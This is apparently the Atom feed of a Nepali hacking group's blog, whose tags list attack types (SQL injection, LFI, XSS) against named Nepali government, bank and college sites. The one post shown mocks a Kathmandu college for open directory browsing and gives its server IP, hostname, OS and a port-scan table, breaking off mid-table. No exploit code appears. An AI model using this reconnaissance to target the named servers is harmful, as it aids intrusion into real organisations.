<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-3339723251203762129</id><updated>2012-02-16T20:17:53.393-08:00</updated><category term='thehimalayantimes.com'/><category term='laxmibank.com'/><category term='enasha.com'/><category term='nbbl.com.np'/><category term='ncell'/><category term='indianembassy.org.np'/><category term='partypopper.com.np'/><category term='nhnepal.com'/><category term='venus.com.np'/><category term='nitc.gov.np'/><category term='lfi'/><category term='lacm.edu.np'/><category term='gov.np'/><category term='sqli'/><category term='myrepublica.com'/><category term='ibb developers'/><category term='ntc.net.np'/><category term='government sites'/><category term='spicenepal.com'/><category term='meromobile'/><category term='sql injection'/><category term='placementnepal.com'/><category term='madhavnepal.com'/><category term='ekantipur.com'/><category term='meroit.com'/><category term='ioe.edu.np'/><category term='pea.edu.np'/><category term='nepal telecom'/><category term='engxpress.com.np'/><category term='khullabazaar.com'/><category term='phpinfo'/><category term='local file inclusion'/><category term='mofsc.gov.np'/><category term='mero mobile'/><category term='ccma.edu.np'/><category term='unsafe upload'/><category term='myktm.com'/><category term='xss'/><category term='hitechacademy.com.np'/><category term='cross site scripting'/><category term='newsofnepal.com'/><category term='himaltech.com'/><category term='dc-nepal.com'/><category term='cybersansar.com'/><title type='text'>Nep Sec || KtM-HaCKeRZ Security blog</title><subtitle type='html'>nepali security and hacking team ktm hackerz shares and informs the vulnerabilities in Nepali websites and webservers. The one and only blog of first nepali hackers group</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://nepsecvulns.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3339723251203762129/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://nepsecvulns.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Cool Samar</name><uri>http://www.blogger.com/profile/12279896812645182956</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://4.bp.blogspot.com/-wzz-gmL-oe8/TcV3bbLLTrI/AAAAAAAAApA/aW39QcZfA9w/s220/Screenshot.png'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>40</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-3339723251203762129.post-165592978454406091</id><published>2010-07-18T08:56:00.001-07:00</published><updated>2010-07-18T09:20:47.349-07:00</updated><title type='text'>Informatics college. Directory browsing enabled.</title><content type='html'>Informatics college situated in Kathmandu promises its student that it  will give you some knowledge about network security and all that fucking  stuffz. Well the biggest problem is that the fuckers themself dont know  about security. Take a look at this:&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_oXLMHC4FG8I/TEMk3zmpDHI/AAAAAAAAAAM/4tn63jC4Kz8/s1600/upload.JPG"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_oXLMHC4FG8I/TEMk3zmpDHI/AAAAAAAAAAM/4tn63jC4Kz8/s400/upload.JPG" alt="" id="BLOGGER_PHOTO_ID_5495276511485824114" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The following are the details of the server:&lt;br /&gt;hostname:informatics.edu.np&lt;br /&gt;uptime:803209s&lt;br /&gt;last reboot:Thu July 08 9:36:45 2010&lt;br /&gt;ip: 74.54.219.66&lt;br /&gt;hostnames:(name-type)&lt;br /&gt;informatics.edu.np-user&lt;br /&gt;lamborghini.websitewelcome.com-PTR&lt;br /&gt;OS-DD_WRT v23(linux kernel version 2.4.36)(ports used: 21,231)&lt;br /&gt;&lt;br /&gt;The details are as follows:&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CBishisht%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} table.MsoTableGrid 	{mso-style-name:"Table Grid"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	border:solid windowtext 1.0pt; 	mso-border-alt:solid windowtext .5pt; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-border-insideh:.5pt solid windowtext; 	mso-border-insidev:.5pt solid windowtext; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;table class="MsoTableGrid" style="border-collapse: collapse; border: medium none;" border="1" cellpadding="0" cellspacing="0"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border: 1pt solid windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Protocol&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;State(0-open/x-filtered)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Service/version&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;7&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;echo&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;9&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Discard&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;13&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Daytime&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;21&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;ftp/PureFTPd&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;22&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Ssh&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;25&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;SMTP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;26&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Smtp/EximSMTPd   469&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;53&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Domain&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;80&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;http&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;110&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Pop3/CourierPOP3d&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;135&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;TCP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="131"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;X&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 131.55pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0in 5.4pt;" valign="top" width="175"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;Msrpc&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="width: 114.65pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0in 5.4pt;" valign="top" width="153"&gt;   &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;;"&gt;139&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 98.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: 